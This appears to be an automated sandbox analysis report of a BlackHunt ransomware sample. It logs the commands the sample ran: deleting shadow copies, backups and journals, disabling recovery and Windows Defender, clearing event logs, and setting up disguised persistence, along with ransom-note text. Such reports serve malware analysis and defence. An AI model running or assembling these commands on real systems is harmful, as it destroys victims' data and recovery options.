PID 2868 wrote to memory of 2576 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 120 PID 2868 wrote to memory of 2576 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 120 PID 2868 wrote to memory of 2640 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 31 PID 2868 wrote to memory of 2640 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 31 PID 2868 wrote to memory of 2640 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 31 PID 2868 wrote to memory of 2640 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 31 PID 2868 wrote to memory of 3048 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 116 PID 2868 wrote to memory of 3048 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 116 PID 2868 wrote to memory of 3048 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 116 PID 2868 wrote to memory of 3048 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 116 PID 2868 wrote to memory of 2392 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 115 PID 2868 wrote to memory of 2392 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 115 PID 2868 wrote to memory of 2392 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 115 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe"C:\Users\Admin\AppData\Local\Temp\31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2868 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2836
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2640
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2468
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1696
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:524
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2308
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2024
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1852
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
- Suspicious use of WriteProcessMemory
PID:2836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2092
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2352
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2384
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3008
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2296
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1232
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1628
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe" /F2⤵PID:268
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:528
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1712
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2500
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1792
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2000
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1800
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:552
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2952
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2940
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2876
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2476
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2512
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2392
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:3048
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2576
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2852
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2612
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2896
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:1164
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2976
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2748
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2860
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2840
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:3392
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:3580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3444
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:3480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3372
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:3644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:3696
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3728
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:3520
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:3280
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:3712
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3560
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3620
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3460
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4000
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3632
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3868
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:3756
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:3576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3604
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:4064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:1648
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:4016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3860
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:1712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3524
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:4092
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:2880
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:2992
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:2056
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1164
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe"2⤵
- Deletes itself
PID:2420 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2192
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:1860
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe" /F1⤵
- Creates scheduled task(s)
PID:1700
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:912
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:704
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:1092
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:1152
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:2664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:1368
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:2040
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2040
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f1⤵PID:840
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:2328
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:580
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:1900
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:1784
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:1780
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f1⤵
- Adds Run key to start application
PID:2812
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2416
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:2604
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2948
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:2696
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1108
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:580
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:320
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD596121c218b44868ae33c6041bd03b945
SHA1be5b2fcd9818166e647671fe7d7c656ca60b6593
SHA256d55fb4324f123b407e71b00234dc10a2d782a65ed03e88b9063554caf8f5f206
SHA512ebb7edaf71009000e3a7b56ff82c4904b7936e643661e3fca86899c2912455ee39bbe4f06bd19d59b4ba1b1c475a30cacf2c766ab681a6f10b8bd2dcda9d6978
-
Filesize
12KB
MD5c6cabe07f864dcb4c650c4929b229f49
SHA14637283ab406a579d28d99745d47b24d9c1e34b4
SHA25691a636b75c92356cd6b96816b1b2270401dfec62479b755c8ac53b5fdfecd8f9
